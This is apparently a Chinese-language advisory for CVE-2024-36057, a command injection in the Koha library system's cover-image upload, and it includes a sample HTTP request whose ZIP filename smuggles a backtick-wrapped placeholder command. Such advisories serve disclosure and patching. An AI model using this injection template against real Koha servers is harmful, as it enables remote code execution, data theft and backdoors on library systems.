CVE ID: CVE-2024-36057
产品: Koha 图书馆软件
漏洞类型: 操作系统命令注入 (CWE-78)
CVSS 评分: 8.7(高危)需认证
受影响版本: 低于 22.05.22
致谢: Karolis Narvilas
Koha 是一个开源集成图书馆系统。在 tools/upload-cover-image.pl 的封面图片上传功能中存在命令注入漏洞。该应用程序使用 qx/unzip $filename -d $dirname/ 来解压上传的 ZIP 压缩包,但未对文件名参数进行清理。
经过认证的高权限用户可以构造一个包含恶意文件名(含反引号字符)的 ZIP 文件来注入任意 shell 命令,当用户点击“处理图片”时,这些命令将在服务器端执行。
影响: 远程认证攻击者可以利用 CVE-2024-36057 在底层服务器上执行任意操作系统命令,导致系统完全被入侵、数据泄露,以及建立持久后门或反弹 Shell。
https://{domain}/cgi-bin/koha/tools/upload-cover-image.pl请求:
POST /cgi-bin/koha/tools/upload-file.pl?temp=1 HTTP/1.1
Host: {domain}
Cookie: [高权限会话]
Connection: close
------WebKitFormBoundaryP82Da5V6eaQOuBUT
Content-Disposition: form-data; name="file"; filename="execute`<INJECTED_COMMAND>`.zip"
Content-Type: application/x-zip-compressed
<zip 文件内容>
------WebKitFormBoundaryP82Da5V6eaQOuBUT--
